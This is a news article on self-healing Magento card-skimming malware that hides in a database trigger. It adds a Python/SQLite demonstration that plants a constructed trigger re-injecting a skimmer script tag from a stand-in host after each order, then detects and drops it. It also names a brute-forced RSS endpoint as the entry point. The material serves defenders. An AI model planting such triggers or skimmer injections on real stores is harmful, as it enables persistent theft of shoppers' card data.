New self-healing malware targets Magento stores

Dutch malware researchers have found a new malware strain that targets online shops running on Magento, one of the most popular e-commerce platforms. What sets it apart is that it can self-heal: the code that restores it after a cleanup is hidden in the shop's own database rather than in any file on disk.

How it works

The malware springs into action whenever a customer places a new order. As the order row is written, a malicious database trigger (a stored set of SQL statements that the database server runs automatically when a row is inserted) executes, independently of the PHP code with which Magento assembles the page. The trigger checks whether the malware's JavaScript is still present in the store's header, footer and copyright sections, and also in the various Magento CMS blocks where the code could live.

If it finds no trace of its JavaScript, the trigger re-inserts it into the stored page content through a series of SQL operations, so the skimmer is back on the storefront before anyone notices it was removed.
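The following Python/SQLite model is an added example, not code from the article or from the malware itself. It plants a hypothetical trigger of the kind described above (the trigger name after_order_insert, the config paths design/head/includes and design/footer/absolute_footer, the CMS block footer_links and the example.invalid payload URL are all constructed), shows that scrubbing the stored HTML does not help because the next order re-plants the script, and then performs the check the researchers call for: inspecting the database's trigger definitions and dropping the offending one. On a real MySQL-backed Magento store the equivalent inventory query is SELECT TRIGGER_NAME, EVENT_OBJECT_TABLE, ACTION_STATEMENT FROM information_schema.TRIGGERS WHERE TRIGGER_SCHEMA = DATABASE(); (or simply SHOW TRIGGERS).

```python
import re
import sqlite3

# Constructed stand-in for the skimmer's <script> tag; the real payload is not on the page.
PAYLOAD = '<script src="https://example.invalid/skimmer.js"></script>'

# Hypothetical self-healing trigger modelled on the behaviour described in the article.
# Trigger name, config paths and block names are assumptions, not the real malware's.
# It fires on every new order and re-appends the tag wherever it has been removed.
MALICIOUS_TRIGGER = f"""
CREATE TRIGGER after_order_insert AFTER INSERT ON sales_order
BEGIN
    UPDATE core_config_data
       SET value = value || '{PAYLOAD}'
     WHERE path IN ('design/head/includes', 'design/footer/absolute_footer')
       AND value NOT LIKE '%skimmer.js%';
    UPDATE cms_block
       SET content = content || '{PAYLOAD}'
     WHERE content NOT LIKE '%skimmer.js%';
END;
"""

SCRIPT_TAG = re.compile(r"<script\b.*?</script>", re.IGNORECASE | re.DOTALL)
# Heuristic for trigger bodies that deserve a human look: they emit script tags or
# write to the tables that hold rendered storefront HTML.
SUSPECT_TRIGGER = re.compile(r"<script|UPDATE\s+(core_config_data|cms_block)", re.IGNORECASE)


def build_store() -> sqlite3.Connection:
    """Toy Magento-like schema with clean content plus the planted trigger (constructed)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE core_config_data (path TEXT PRIMARY KEY, value TEXT);
        CREATE TABLE cms_block (identifier TEXT PRIMARY KEY, content TEXT);
        CREATE TABLE sales_order (increment_id TEXT PRIMARY KEY, grand_total REAL);
        INSERT INTO core_config_data VALUES
            ('design/head/includes', '<link rel="stylesheet" href="/skin/style.css">'),
            ('design/footer/absolute_footer', '<p>Thanks for shopping</p>');
        INSERT INTO cms_block VALUES ('footer_links', '<ul><li>About us</li></ul>');
    """)
    con.executescript(MALICIOUS_TRIGGER)
    return con


def infected_locations(con: sqlite3.Connection) -> list[str]:
    """Config paths and block identifiers whose stored HTML currently contains a script tag."""
    rows = con.execute(
        "SELECT path FROM core_config_data WHERE value LIKE '%<script%' "
        "UNION ALL SELECT identifier FROM cms_block WHERE content LIKE '%<script%'"
    ).fetchall()
    return sorted(r[0] for r in rows)


def place_order(con: sqlite3.Connection, increment_id: str, total: float) -> None:
    """What a checkout does: insert a sales_order row. This is what fires the trigger."""
    con.execute("INSERT INTO sales_order VALUES (?, ?)", (increment_id, total))
    con.commit()


def scrub_content(con: sqlite3.Connection) -> int:
    """The content-only response: strip script tags from stored HTML. Returns rows changed."""
    changed = 0
    for table, key, col in (("core_config_data", "path", "value"),
                            ("cms_block", "identifier", "content")):
        for key_val, html in con.execute(f"SELECT {key}, {col} FROM {table}").fetchall():
            cleaned = SCRIPT_TAG.sub("", html)
            if cleaned != html:
                con.execute(f"UPDATE {table} SET {col} = ? WHERE {key} = ?", (cleaned, key_val))
                changed += 1
    con.commit()
    return changed


def suspicious_triggers(con: sqlite3.Connection) -> list[tuple[str, str]]:
    """Database analysis: (trigger, table) pairs whose definition matches the heuristic."""
    return [
        (name, table)
        for name, table, sql in con.execute(
            "SELECT name, tbl_name, sql FROM sqlite_master WHERE type = 'trigger'"
        )
        if SUSPECT_TRIGGER.search(sql)
    ]


def drop_triggers(con: sqlite3.Connection, names: list[str]) -> None:
    for name in names:
        con.execute(f'DROP TRIGGER "{name}"')
    con.commit()


def demo() -> dict:
    """Infection, a content-only cleanup that fails, then the trigger-level fix that holds."""
    con = build_store()
    result = {"before": infected_locations(con)}
    place_order(con, "100000001", 49.90)
    result["after_order"] = infected_locations(con)   # trigger planted the tag
    scrub_content(con)
    result["after_scrub"] = infected_locations(con)   # looks clean...
    place_order(con, "100000002", 12.50)
    result["reinfected"] = infected_locations(con)    # ...until the next order
    result["triggers"] = suspicious_triggers(con)
    drop_triggers(con, [name for name, _ in result["triggers"]])
    scrub_content(con)
    place_order(con, "100000003", 5.00)
    result["after_fix"] = infected_locations(con)     # stays clean
    return result


if __name__ == "__main__":
    for step, value in demo().items():
        print(f"{step:>12}: {value}")
```

Treat the trigger list as a review queue rather than something to drop blindly: not every trigger is malicious (Magento 2's indexer "Update by Schedule" mode creates its own), and a copy of each dropped definition is useful forensic evidence.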

The malware itself is a payment skimmer: it steals customers' card details at checkout, which puts a great many shoppers at risk. The SQL part of the code adds nothing to the theft; its job is to keep the skimmer alive on the platform for as long as possible.

“The discovery shows we have entered a new phase of malware evolution. Just scanning files is not enough anymore; malware detection methods should now include database analysis,” de Groot writes.

“You could scan a dump of your database and know whether it contains malicious stuff. But now, the actual malware is executed inside the DB,” de Groot said. He added: “This is the first time I see malware written in SQL. Previously, malware was written in JS or PHP.”

In this strain the JavaScript and PHP components do the actual card skimming; the novel SQL component exists only to make sure those components survive removal attempts.

“The malware got resilient against removal attempts, and the malware attacks the DB instead of the e-commerce app.”

The strain appears to get into databases following brute-force attacks on the /rss/catalog/notifystock/ URL, and it does so even on completely patched shops. In other words, the entry point is credential guessing rather than a software vulnerability, so patching alone does not stop it; restricting or rate-limiting that endpoint and enforcing strong admin credentials are the practical defences, alongside the database-level checks described above.
